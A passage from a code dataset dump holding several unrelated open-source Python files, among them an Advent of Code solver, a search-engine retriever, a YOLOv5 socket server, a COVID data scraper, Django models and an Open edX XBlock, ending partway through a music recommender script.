\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# import argparse\r\n# import httplib2\r\n# import os\r\n# import random\r\n# import time\r\n\r\n# import google.oauth2.credentials\r\n# import google_auth_oauthlib.flow\r\n# from googleapiclient.discovery import build\r\n# from googleapiclient.errors import HttpError\r\n# from googleapiclient.http import MediaFileUpload\r\n# from google_auth_oauthlib.flow import InstalledAppFlow\r\n\r\n\r\n# # Explicitly tell the underlying HTTP transport library not to retry, since\r\n# # we are handling retry logic ourselves.\r\n# httplib2.RETRIES = 1\r\n\r\n# # Maximum number of times to retry before giving up.\r\n# MAX_RETRIES = 10\r\n\r\n# # Always retry when these exceptions are raised.\r\n# RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, httplib.NotConnected,\r\n# httplib.IncompleteRead, httplib.ImproperConnectionState,\r\n# httplib.CannotSendRequest, httplib.CannotSendHeader,\r\n# httplib.ResponseNotReady, httplib.BadStatusLine)\r\n\r\n# # Always retry when an apiclient.errors.HttpError with one of these status\r\n# # codes is raised.\r\n# RETRIABLE_STATUS_CODES = [500, 502, 503, 504]\r\n\r\n# # The CLIENT_SECRETS_FILE variable specifies the name of a file that contains\r\n# # the OAuth 2.0 information for this application, including its client_id and\r\n# # client_secret. You can acquire an OAuth 2.0 client ID and client secret from\r\n# # the {{ Google Cloud Console }} at\r\n# # {{ https://cloud.google.com/console }}.\r\n# # Please ensure that you have enabled the YouTube Data API for your project.\r\n# # For more information about using OAuth2 to access the YouTube Data API, see:\r\n# # https://developers.google.com/youtube/v3/guides/authentication\r\n# # For more information about the client_secrets.json file format, see:\r\n# # https://developers.google.com/api-client-library/python/guide/aaa_client_secrets\r\n# CLIENT_SECRETS_FILE = 'client_secret.json'\r\n\r\n# # This OAuth 2.0 access scope allows an application to upload files to the\r\n# # authenticated user's YouTube channel, but doesn't allow other types of access.\r\n# SCOPES = ['https://www.googleapis.com/auth/youtube.upload']\r\n# API_SERVICE_NAME = 'youtube'\r\n# API_VERSION = 'v3'\r\n\r\n# VALID_PRIVACY_STATUSES = ('public', 'private', 'unlisted')\r\n\r\n\r\n# # Authorize the request and store authorization credentials.\r\n# def get_authenticated_service():\r\n# flow = InstalledAppFlow.from_client_secrets_file(CLIENT_SECRETS_FILE, SCOPES)\r\n# credentials = flow.run_console()\r\n# return build(API_SERVICE_NAME, API_VERSION, credentials = credentials)\r\n\r\n# def initialize_upload(youtube, options):\r\n# tags = None\r\n# if options.keywords:\r\n# tags = options.keywords.split(',')\r\n\r\n# body=dict(\r\n# snippet=dict(\r\n# title=options.title,\r\n# description=options.description,\r\n# tags=tags,\r\n# categoryId=options.category\r\n# ),\r\n# status=dict(\r\n# privacyStatus=options.privacyStatus\r\n# )\r\n# )\r\n\r\n# # Call the API's videos.insert method to create and upload the video.\r\n# insert_request = youtube.videos().insert(\r\n# part=','.join(body.keys()),\r\n# body=body,\r\n# # The chunksize parameter specifies the size of each chunk of data, in\r\n# # bytes, that will be uploaded at a time. Set a higher value for\r\n# # reliable connections as fewer chunks lead to faster uploads. Set a lower\r\n# # value for better recovery on less reliable connections.\r\n# #\r\n# # Setting 'chunksize' equal to -1 in the code below means that the entire\r\n# # file will be uploaded in a single HTTP request. (If the upload fails,\r\n# # it will still be retried where it left off.) This is usually a best\r\n# # practice, but if you're using Python older than 2.6 or if you're\r\n# # running on App Engine, you should set the chunksize to something like\r\n# # 1024 * 1024 (1 megabyte).\r\n# media_body=MediaFileUpload(options.file, chunksize=-1, resumable=True)\r\n# )\r\n\r\n# resumable_upload(insert_request)\r\n\r\n# # This method implements an exponential backoff strategy to resume a\r\n# # failed upload.\r\n# def resumable_upload(request):\r\n# response = None\r\n# error = None\r\n# retry = 0\r\n# while response is None:\r\n# try:\r\n# print('Uploading file...')\r\n# status, response = request.next_chunk()\r\n# if response is not None:\r\n# if 'id' in response:\r\n# print('Video id \"%s\" was successfully uploaded.') % response['id']\r\n# else:\r\n# exit('The upload failed with an unexpected response: %s' % response)\r\n# except HttpError, e:\r\n# if e.resp.status in RETRIABLE_STATUS_CODES:\r\n# error = 'A retriable HTTP error %d occurred:\\n%s' % (e.resp.status,\r\n# e.content)\r\n# else:\r\n# raise\r\n# except RETRIABLE_EXCEPTIONS, e:\r\n# error = 'A retriable error occurred: %s' % e\r\n\r\n# if error is not None:\r\n# print error\r\n# retry += 1\r\n# if retry > MAX_RETRIES:\r\n# exit('No longer attempting to retry.')\r\n\r\n# max_sleep = 2 ** retry\r\n# sleep_seconds = random.random() * max_sleep\r\n# print 'Sleeping %f seconds and then retrying...' % sleep_seconds\r\n# time.sleep(sleep_seconds)\r\n\r\n# if __name__ == '__main__':\r\n# parser = argparse.ArgumentParser()\r\n# parser.add_argument('--file', required=True, help='Video file to upload')\r\n# parser.add_argument('--title', help='Video title', default='Test Title')\r\n# parser.add_argument('--description', help='Video description',\r\n# default='Test Description')\r\n# parser.add_argument('--category', default='22',\r\n# help='Numeric video category. ' +\r\n# 'See https://developers.google.com/youtube/v3/docs/videoCategories/list')\r\n# parser.add_argument('--keywords', help='Video keywords, comma separated',\r\n# default='')\r\n# parser.add_argument('--privacyStatus', choices=VALID_PRIVACY_STATUSES,\r\n# default='private', help='Video privacy status.')\r\n# args = parser.parse_args()\r\n\r\n# youtube = get_authenticated_service()\r\n\r\n# try:\r\n# initialize_upload(youtube, args)\r\n# except HttpError, e:\r\n# print 'An HTTP error %d occurred:\\n%s' % (e.resp.status, e.content)","repo_name":"carlosmmieses/Sm_Automation","sub_path":"yt_automation.py","file_name":"yt_automation.py","file_ext":"py","file_size_in_byte":13456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15534759547","text":"\ntds = \"\"\"\nmxmxvkd kfcds sqjhc nhms (contains dairy, fish)\ntrh fvjkl sbzzf mxmxvkd (contains dairy)\nsqjhc fvjkl (contains soy)\nsqjhc mxmxvkd sbzzf (contains fish)\"\"\"\n\ndef read_data(infile):\n rs = []\n for line in infile:\n line = line.strip().rstrip(\")\")\n line = line.replace(\",\",\"\")\n ings_s, algs_s = line.split(\"(contains \")\n rs.append((set(ings_s.split()), set(algs_s.split())))\n return rs\n\ndef possible_assignments(rules):\n all_algs = set.union(*[algs for (ings,algs) in rules])\n can_be = {}\n for alg in all_algs:\n can_be[alg] = set.intersection(*[ings for (ings,algs) in rules if alg in algs])\n return can_be\n\ndef part1(rules):\n can_be = possible_assignments(rules)\n all_used_ings = set.union(*can_be.values())\n sm = 0\n for (ings,algs) in rules:\n sm += sum(1 for i in ings if i not in all_used_ings)\n return sm\n\ntest_rules = read_data(tds.strip().splitlines())\nassert part1(test_rules) == 5\n\nwith open(\"input.txt\") as infile:\n rules = read_data(infile)\n#rules = read_data(inp)\nprint(\"PART1:\", part1(rules))\n#gc.collect()\n\n# immutable maps\ndef lookup(m, k):\n while m != None:\n (car,cdr) = m\n if car[0] == k:\n return car[1]\n m = cdr\n return None\n\ndef solve(rs, i, m):\n if i >= len(rs):\n return True, m\n\n (alg,ings) = rs[i]\n for ing in ings:\n if lookup(m, ing):\n continue\n\n ok,m2 = solve(rs, i+1, ((ing,alg), m))\n if ok:\n return True, m2\n return False, m\n\ndef part2(rules):\n rs = list(possible_assignments(rules).items())\n m = None\n ok, m = solve(rs, 0, m)\n assert ok\n # reverse m into a dict\n rm = {}\n while m != None:\n car,cdr = m\n rm[car[1]] = car[0]\n m = cdr\n return \",\".join(rm[k] for k in sorted(rm.keys()))\n\nassert part2(test_rules) == \"mxmxvkd,sqjhc,fvjkl\"\n\nprint(\"PART2:\", part2(rules))\n","repo_name":"MikeBeller/janet-cookbook","sub_path":"examples/advent/2020/21/2020-21.py","file_name":"2020-21.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"60"} +{"seq_id":"35988338702","text":"from nltk.stem.porter import PorterStemmer\nfrom collections import defaultdict\nfrom itertools import islice\nfrom urllib.parse import urldefrag\nimport math\nimport time\nimport re\n\nseek_dict = defaultdict(str)\n\n\"\"\"\nLoads seek_index.txt into memory as a dictionary of\nalphabetical positions of our index and its pointer position\n\"\"\"\ndef load_seek_dict():\n global seek_dict\n \n with open(\"seek_index.txt\") as f:\n for line in f:\n seek_dict[line[0]] = int(line[2:].strip())\n\n\"\"\"\nCalculates the dot product of 2 vectors\n\"\"\"\ndef cosine(q_vector, d_vector):\n dot_prod = 0\n \n for i in range(len(q_vector)):\n dot_prod += q_vector[i] * d_vector[i]\n \n return dot_prod\n\n\"\"\"\nAlgorithm:\n 1) Parse query terms and stem them\n 2) Use alphabetical seek positions of index.txt to find terms quickly\n 3) Calculate query ltc and normalize the weight\n 4) Calculate the cosine similarity of query ltc and document lnc\nReturns a dictionary of documents and their cosine similarity score with the query\n\"\"\"\ndef query(query_string) -> defaultdict(list):\n stemmer = PorterStemmer()\n query_terms = [stemmer.stem(query) for query in re.sub(r'[^a-zA-Z0-9]', ' ', query_string.lower()).split() if len(stemmer.stem(query)) > 2] # stem the query and make sure its length is > 2\n relevance = defaultdict(list)\n query_vector = list()\n normalization = 0\n \n with open(\"index.txt\", \"r\") as f:\n for term in query_terms:\n f.seek(seek_dict[term[0]]) # find file position where query is close by starting at the same alphanumeric position in the index\n line = f.readline()\n \n while (line.split(\" | \")[0] != term):\n if (line.split(\" | \")[0] > term): # if term found in index > query_term, there is no point iterating further \n return relevance # and we will not find the term in the index; continue onto next query_term\n line = f.readline()\n \n\n \n parsed_line = line.split(\" | \")\n term_idf = (1 + math.log(query_terms.count(term))) * math.log(55393/len(parsed_line[1].split())) # calculate each query term's idf\n query_vector.append(term_idf) # vector representation of query with idf (not normalized yet)\n normalization += term_idf ** 2 # keeping track of normalization factor to correctly normalize query vector weight\n \n for posting in parsed_line[1].split():\n doc, score = posting.split(\"#\")\n \n if (\"!\" in doc):\n doc = doc[:-1]\n \n relevance[int(doc)].append(float(score)) # dictionary of all relevant documents containing at least a part of the query term, where key = term and value = normalized lnc\n\n # return a dictionary comprehension where we find the cosine similarity of ltc (normalized query vector) \n # and lnc (normalized document vector) only if they have equal dimensions\n # key = doc_id, value = lnc.ltc ranking based on cosine similarity\n return {key : cosine([dimension / math.sqrt(normalization) for dimension in query_vector], value) for key, value in relevance.items() if len(value) == len(query_vector)} \n\n\"\"\"\nOutputs the results of a query, ordered by cosine similarity\n\"\"\"\ndef print_urls(query_results, display = 10):\n unique_urls = set()\n for i, (doc, score) in enumerate(sorted(query_results.items(), key=lambda x:x[1], reverse=True)):\n with open(\"document_map.txt\") as f:\n line = next(islice(f, doc, doc + 1)).split(\" \")[1].strip() # go to exact line in document_map.txt to find URL\n if (urldefrag(line)[0] not in unique_urls): # duplicate detection, URL might not be unique after we defrag it so we do not output non-unique URLs\n unique_urls.add(urldefrag(line)[0])\n print(\"{}\".format(urldefrag(line)[0]))\n \n if (i >= display - 1): # display only top 10 results or custom amount of results\n break\n \nif __name__ == \"__main__\":\n load_seek_dict()\n\n while (True):\n q = input(\"Enter a search query (or enter !q to quit): \")\n q = q.lower().strip()\n \n if (q == \"!q\"):\n break\n \n start = time.time()\n results = query(q)\n end = time.time()\n print(\"Found {} results for query '{}' in {:.3f} ms\\n\".format(len(results), q, (end - start) * 1000)) \n \n if (len(results) == 0):\n continue \n else:\n display = input(\"How many results would you like to see? (press Enter to see default = 10 results): \")\n \n if (display == \"\"):\n print()\n print_urls(results)\n else:\n try:\n display = float(display)\n print_urls(results, display)\n except ValueError:\n print(\"Incorrect format detected; showing default = up to 10 results.\\n\")\n print_urls(results)\n \n print()\n \n \n ","repo_name":"jcvong/search-engine","sub_path":"src/retriever.py","file_name":"retriever.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8946016187","text":"#!/usr/bin/env python3\n# vi: set shiftwidth=4 tabstop=8 expandtab:\nimport numpy as np\nimport cv2 as cv\nimport socket\nimport torch\n\nHOST = \"127.0.0.1\" # Standard loopback interface address (localhost)\nPORT = 10000 # Port to listen on (non-privileged ports are > 1023)\n\nb_imagen = bytearray()\n\n# Model\nmodel = torch.hub.load('ultralytics/yolov5', 'yolov5s')\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen()\n while True:\n conn, addr = s.accept()\n # Limpiamos el arreglo\n b_imagen.clear()\n with conn:\n # recivimos los primeros bytes\n data = conn.recv(4096)\n img_size = int.from_bytes(data[:4], byteorder=\"little\")\n b_imagen += data[4:]\n print(f\"Connected by {addr}, size:\", img_size)\n while len(b_imagen) < img_size:\n data = conn.recv(4096)\n b_imagen += data\n if not data:\n print(\"break\")\n break\n\n print(\"ok\", len(b_imagen))\n\n # Los bytes los hacemos arreglo de numpy\n img_enc = np.ndarray(shape=(len(b_imagen),), dtype='uint8',\n buffer=b_imagen, )\n\n # Convertimos la imagen JPG a imagen RAW\n color = cv.imdecode(img_enc, cv.IMREAD_COLOR)\n\n # Inference\n results = model(color)\n ret = results.pandas().xyxy[0].to_json(orient=\"records\")\n conn.sendall(ret.encode())\n","repo_name":"miguelinux/materia-celn","sub_path":"scripts/imagen-compressed-torch-server.py","file_name":"imagen-compressed-torch-server.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43250346190","text":"from django.test import TestCase\n\nfrom patchwork.models import Comment\n\nNOT_TAGS = \\\n\"\"\"\nHey, hi, hello\n\nmessage\n\nNonsense-by: zzz\n\"\"\"\n\nTAGS = \\\n\"\"\"\nReviewed-by: aaa\nFixes: foo\nSigned-off-by: bbb\nAcked-by: bar\nTested-by: ccc\nNacked-by: baz\nReported-by: ddd\n\"\"\"\n\n\nclass CommentTest(TestCase):\n def testPatchResponse(self):\n comment = Comment()\n comment.content = NOT_TAGS + TAGS\n\n reference_tags = TAGS.split()\n actual_tags = comment.patch_responses().split()\n\n self.assertListEqual(sorted(reference_tags), sorted(actual_tags))\n","repo_name":"dlespiau/patchwork","sub_path":"patchwork/tests/test_comment.py","file_name":"test_comment.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"60"} +{"seq_id":"31436551974","text":"__copyright__ = \"Copyright (C) 2020 Sotiris Niarchos\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nimport numpy as np\n\nimport pyopencl as cl\nimport pyopencl.cltypes as cltypes\nimport pyopencl.tools as cl_tools\nfrom pyopencl import mem_flags\nfrom pyopencl.tools import ( # noqa: F401\n pytest_generate_tests_for_pyopencl as pytest_generate_tests)\n\n\ndef test_struct_with_array_fields(ctx_factory):\n #\n # typedef struct {\n # uint x[2];\n # float y;\n # uint z[3][4];\n # } my_struct;\n #\n cl_ctx = ctx_factory()\n device = cl_ctx.devices[0]\n queue = cl.CommandQueue(cl_ctx)\n\n my_struct = np.dtype([\n (\"x\", cltypes.uint, 2),\n (\"y\", cltypes.int),\n (\"z\", cltypes.uint, (3, 4))\n ])\n my_struct, cdecl = cl_tools.match_dtype_to_c_struct(\n device, \"my_struct\", my_struct\n )\n\n # a random buffer of 4 structs\n my_struct_arr = np.array([\n ([81, 24], -57, [[15, 28, 45, 7], [71, 95, 65, 84], [2, 11, 59, 9]]),\n ([5, 20], 47, [[15, 53, 7, 59], [73, 22, 27, 86], [59, 6, 39, 49]]),\n ([11, 99], -32, [[73, 83, 4, 65], [19, 21, 22, 27], [1, 55, 6, 64]]),\n ([57, 38], -54, [[74, 90, 38, 67], [77, 30, 99, 18], [91, 3, 63, 67]])\n ], dtype=my_struct)\n\n expected_res = []\n for x in my_struct_arr:\n expected_res.append(int(np.sum(x[0]) + x[1] + np.sum(x[2])))\n expected_res = np.array(expected_res, dtype=cltypes.int)\n\n kernel_src = \"\"\"%s\n // this kernel sums every number contained in each struct\n __kernel void array_structs(__global my_struct *structs, __global int *res) {\n int i = get_global_id(0);\n my_struct s = structs[i];\n res[i] = s.x[0] + s.x[1] + s.y;\n for (int r = 0; r < 3; r++)\n for (int c = 0; c < 4; c++)\n res[i] += s.z[r][c];\n }\"\"\" % cdecl\n\n mem_flags1 = mem_flags.READ_ONLY | mem_flags.COPY_HOST_PTR\n mem_flags2 = mem_flags.WRITE_ONLY\n\n my_struct_buf = cl.Buffer(cl_ctx, mem_flags1, hostbuf=my_struct_arr)\n res_buf = cl.Buffer(cl_ctx, mem_flags2, size=expected_res.nbytes)\n\n program = cl.Program(cl_ctx, kernel_src).build()\n kernel = program.array_structs\n kernel(queue, (4,), None, my_struct_buf, res_buf)\n\n res = np.empty_like(expected_res)\n cl.enqueue_copy(queue, res, res_buf)\n\n assert (res == expected_res).all()\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) > 1:\n exec(sys.argv[1])\n else:\n from pytest import main\n main([__file__])\n","repo_name":"inducer/pyopencl","sub_path":"test/test_arrays_in_structs.py","file_name":"test_arrays_in_structs.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":998,"dataset":"github-code","pt":"60"} +{"seq_id":"6246079415","text":"import requests, openpyxl, io, csv, datetime\nimport county_report, state_report\n\nSTATE_ABBR = 'IN'\nSTATE = 'Indiana'\nURL = 'https://hub.mph.in.gov/dataset/89cfa2e3-3319-4d31-a60d-710f76856588/resource/8b8e6cd7-ede2-4c41-a9bd-4266df783145/download/covid_report_county.xlsx'\n\ndef scraper():\n # make an HTTP web request to get the file\n response = requests.get(URL)\n\n if response.status_code == requests.codes.ok:\n # Success - print to the console that the HTTP request succeeeded\n print(' ', STATE_ABBR, ': Downloaded succeeded')\n\n data = io.BytesIO(response.content)\n\n wb = openpyxl.load_workbook(filename=data, read_only=True, data_only=True)\n \n sheet = wb.worksheets[0]\n\n counties = []\n\n for i in range(2, 94):\n rowCount = str(i)\n \n county = sheet['E' + rowCount].value\n confirmed = sheet['B' + rowCount].value\n deaths = sheet['C' + rowCount].value\n \n county = county_report.CountyReport(STATE, county, (int)(confirmed), (int)(deaths), -1, -1, datetime.datetime.now())\n counties.append(county) # append the countyReport to our list of counties\n\n # print the number of counties we processed\n print(' ', STATE_ABBR, ':', len(counties), ' counties processed OK')\n\n # build the state-level report object that will include all of the counties\n stateReport = state_report.StateReport(STATE, STATE_ABBR, counties, datetime.datetime.now())\n \n # return the state-level report\n return stateReport\n \n\n else:\n # Fail\n print(' ', STATE_ABBR, ': ERROR : Web download failed - HTTP status code ', response.status_code)","repo_name":"erik1066/covid-web-scraper","sub_path":"src/in_scraper.py","file_name":"in_scraper.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"26673885454","text":"\"\"\" Module that monkey-patches json module when it's imported so\nJSONEncoder.default() automatically checks for a special \"to_json()\"\nmethod and uses it to encode the object if found.\n\"\"\"\nfrom lib.Storage import Storage\nimport utility as ServerUtil\nfrom connexion_plus import App, MultipleResourceResolver, Util\nfrom RDS import Util as CommonUtil\n\nimport logging, os\n\nlog_level = os.environ.get(\"LOGLEVEL\", \"DEBUG\")\nlogger = logging.getLogger(\"\")\nlogging.getLogger(\"\").handlers = []\nlogging.basicConfig(format=\"%(asctime)s %(message)s\", level=log_level)\n\n\ndef bootstrap(name=\"MicroService\", testing=False, *args, **kwargs):\n list_openapi = Util.load_oai(\"central-service_token-storage.yml\")\n\n app = App(name, *args, **kwargs)\n\n opts = {\n \"use_in_memory_on_failure\": (\n os.getenv(\"use_inmemory_as_fallover\", \"False\").capitalize() == \"True\"\n )\n }\n if testing:\n app.app.config.update({\"TESTING\": True})\n opts = {\"use_in_memory_on_failure\": True}\n\n CommonUtil.monkeypatch(app=app.app)\n\n ServerUtil.storage = Storage(**opts)\n\n for oai in list_openapi:\n app.add_api(\n oai,\n resolver=MultipleResourceResolver(\"api\", collection_endpoint_name=\"index\"),\n validate_responses=True,\n )\n\n\n return app\n","repo_name":"Sciebo-RDS/Sciebo-RDS","sub_path":"RDS/layer3_central_services/token_storage/src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"60"} +{"seq_id":"6541554399","text":"# pylint: disable=import-error\n''' Review XBlock '''\n\nfrom __future__ import absolute_import\nimport logging\n\nimport pkg_resources\n\nfrom six.moves import range\n\nfrom xblock.core import XBlock\nfrom xblock.fields import Integer, Scope, String\nfrom xblock.fragment import Fragment\nfrom xblockutils.resources import ResourceLoader\n\nfrom .configuration import SHOW_PROBLEMS, SHOW_VERTICAL\nfrom .get_review_ids import get_problems, get_vertical\n\nlog = logging.getLogger(__name__)\nloader = ResourceLoader(__name__)\n\n\n# Make '_' a no-op so we can scrape strings. Using below function instead of\n# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file\ndef _(text):\n return text\n\n\n@XBlock.needs('i18n')\nclass ReviewXBlock(XBlock):\n '''\n The Review XBlock helps learners review concepts from a course by redisplaying\n a handful of problems from the course with a fresh state that are ungraded and\n have unlimited attempts.\n '''\n display_name = String(\n display_name=_('Display Name'),\n help=_('The display name for this component.'),\n scope=Scope.settings,\n default=_('Review'),\n )\n\n num_desired = Integer(\n display_name=_('Number of desired review problems'),\n help=_('Defines the number of problems the review module will display '\n 'to the learner. You do not need this if displaying a full unit.'),\n default=5,\n values={\"min\": 2},\n scope=Scope.content\n )\n\n def resource_string(self, path):\n '''Handy helper for getting resources from our kit.'''\n data = pkg_resources.resource_string(__name__, path)\n return data.decode('utf8')\n\n def get_problem_html(self):\n '''\n Create the html for showing review problems by picking individual\n problems. This calls the get_problems function which will return\n self.num_desired urls to display in iFrames for the Review XBlock.\n '''\n # url_list elements have the form (url, correctness, attempts)\n url_list = get_problems(self.num_desired, self.course_id)\n if len(url_list) == self.num_desired:\n review_context_dict = {'number_desired': self.num_desired}\n template = loader.render_django_template('/templates/review.html', review_context_dict)\n # Want to wrap all of the problems inside of a div\n template += '
    \\n'\n\n for i in range(self.num_desired):\n problem_url, correctness, num_attempts = url_list[i]\n prob_context_dict = {\n 'problem_url': problem_url,\n 'correctness': correctness,\n 'num_attempts': num_attempts,\n 'index': i+1\n }\n template += loader.render_django_template('/templates/review_content_problem.html', prob_context_dict)\n template += '
    '\n return template\n return ''\n\n def get_vertical_html(self):\n '''\n Create the html for showing review problems by picking a single unit\n to show to a learner (which will contain 1 or more problems). This\n calls the get_vertical function which will return a single url to\n display in an iFrame for the Review XBlock.\n '''\n vertical_url = get_vertical(self.course_id)\n if vertical_url:\n review_context_dict = {'number_desired': 'some'}\n template = loader.render_django_template('/templates/review.html', review_context_dict)\n # Want to wrap all of the problems inside of a div\n template += '
    \\n'\n vert_context_dict = {'vertical_url': vertical_url}\n template += loader.render_django_template('/templates/review_content_vertical.html', vert_context_dict)\n template += '
    '\n return template\n return ''\n\n def student_view(self, context=None): # pylint: disable=unused-argument\n '''\n The primary view of the ReviewXBlock, shown to students\n when viewing courses.\n '''\n html = ''\n if str(self.course_id) in SHOW_PROBLEMS:\n html = self.get_problem_html()\n elif str(self.course_id) in SHOW_VERTICAL:\n html = self.get_vertical_html()\n if not html:\n # Default html if no problems or vertical are shown\n html = loader.render_django_template('/templates/no_review.html')\n frag = Fragment(html)\n frag.add_css(self.resource_string('static/css/review.css'))\n frag.add_javascript(self.resource_string('static/js/src/review.js'))\n frag.initialize_js('ReviewXBlock')\n return frag\n\n def studio_view(self, context):\n '''\n The view of the ReviewXBlock shown to course teams when they access\n the XBlock in studio.\n '''\n return self.student_view(context)\n","repo_name":"edx-unsupported/xblock-review","sub_path":"review/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"37308553137","text":"from django.db import models\nfrom django.conf import settings\n\nfrom .managers import BridgeManager\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Bridge(models.Model):\n height = models.DecimalField(\n _('bridge height'),\n max_digits=4,\n decimal_places=2,\n blank=True,\n null=True,\n )\n width = models.DecimalField(\n _('bridge width'),\n max_digits=4,\n decimal_places=2,\n blank=True,\n null=True,\n )\n latitude_north = models.DecimalField(\n _('bounding box north latitude'),\n max_digits=10,\n decimal_places=7,\n )\n latitude_south = models.DecimalField(\n _('bounding box south latitude'),\n max_digits=10,\n decimal_places=7,\n )\n longitude_west = models.DecimalField(\n _('bounding box west longitude'),\n max_digits=10,\n decimal_places=7,\n )\n longitude_east = models.DecimalField(\n _('bounding box east longitude'),\n max_digits=10,\n decimal_places=7,\n )\n latitude = models.DecimalField(\n _('bounding box center latitude'),\n max_digits=10,\n decimal_places=7,\n )\n longitude = models.DecimalField(\n _('bounding box center longitude'),\n max_digits=10,\n decimal_places=7,\n )\n created_date = models.DateTimeField(\n _('date of creation'),\n auto_now_add=True,\n )\n last_update = models.DateTimeField(\n _('date of last update'),\n auto_now=True,\n )\n contributors = models.ManyToManyField(\n settings.AUTH_USER_MODEL,\n verbose_name=_('bridge contributors'),\n related_name=\"bridges\",\n through='BridgeUpdate',\n )\n\n objects = BridgeManager()\n\n class Meta:\n verbose_name = _(\"bridge\")\n verbose_name_plural = _(\"bridges\")\n\n def __str__(self):\n return f\"({self.latitude:.7f}, {self.longitude:.7f})\"\n\n @property\n def bbox(self):\n \"\"\"Dictionary representation of the bounding box.\"\"\"\n return [\n self.longitude_west,\n self.latitude_south,\n self.longitude_east,\n self.latitude_north,\n ]\n\n @bbox.setter\n def bbox(self, values):\n self.longitude_west = values[0]\n self.latitude_south = values[1]\n self.longitude_east = values[2]\n self.latitude_north = values[3]\n\n @property\n def bbox_string(self):\n \"\"\"String representation of the bounding box.\"\"\"\n return (\n f\"bbox:{self.longitude_west:.7f},{self.latitude_south:.7f},\"\n f\"{self.longitude_east:.7f},{self.latitude_north:.7f}\"\n )\n\n\nclass BridgeUpdate(models.Model):\n contributor = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_('update contributor'),\n on_delete=models.CASCADE,\n related_name=\"bridge_updates\",\n )\n bridge = models.ForeignKey(\n 'Bridge',\n verbose_name=_('updated bridge'),\n on_delete=models.CASCADE,\n related_name=\"bridge_updates\",\n )\n updated_date = models.DateTimeField(auto_now_add=True)\n","repo_name":"jerem33620/jeremy_p13","sub_path":"bridges/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18764115304","text":"'''\r\nHomework10MusicRecommender\r\nName: Timothy Stephens,Rachael Kondrat\r\nDate: April 14, 2020\r\nPledge: We pledge our honor that we have abided by the Stevens Honor System.\r\n'''\r\n\r\n# a very complex music recommender system ;-;\r\n\r\nfrom cs115 import *\r\n\r\nPREF_FILE = 'musicrecplus_ex2_b.txt'\r\n\r\n\r\ndef loadUsers(fileName):\r\n ''' Reads in a file of stored users' preferences\r\n stored in the file 'fileName'.\r\n Returns a dictionary containing a mapping\r\n of user names to a list preferred artists\r\n '''\r\n try:\r\n file = open(fileName, 'r')\r\n userDict={}\r\n for line in file:\r\n # Read and parse a single line\r\n [userName, bands] = line.strip().split(\":\")\r\n bandList = bands.split(\",\")\r\n bandList.sort()\r\n userDict[userName] = bandList\r\n file.close()\r\n return userDict\r\n except FileNotFoundError:\r\n userDict={}\r\n return userDict\r\n \r\n\r\ndef EnterPreferences(userName, userMap):\r\n ''' Allows user to enter preferences. Returns user to menu promptly after. '''\r\n newPref = \"\"\r\n prefs = []\r\n newPref = input(\"Enter an artist that you like (Enter to finish): \")\r\n while newPref != \"\":\r\n prefs.append(newPref.strip().title())\r\n newPref = input('Please enter another artist or band that you like or just press Enter to see Menu:')\r\n prefs.sort()\r\n userMap[userName] = prefs\r\n return userMap\r\n \r\n#figure out how to get back to menu!!!\r\n\r\n\r\n\r\ndef getRecommendations(userName, prefs, userMap): #some error i forgot\r\n '''Gets recommendations for a user (userName) based\r\n on the users in userMap (a dictionary) and the user's\r\n preferences in pref (a list). Returns a list of recommend\r\n artists.'''\r\n bestUser = findBestUser(userName, prefs, userMap)\r\n if len(bestUser) == 0:\r\n print(\"No recommendations available at this time.\")\r\n recommendations = 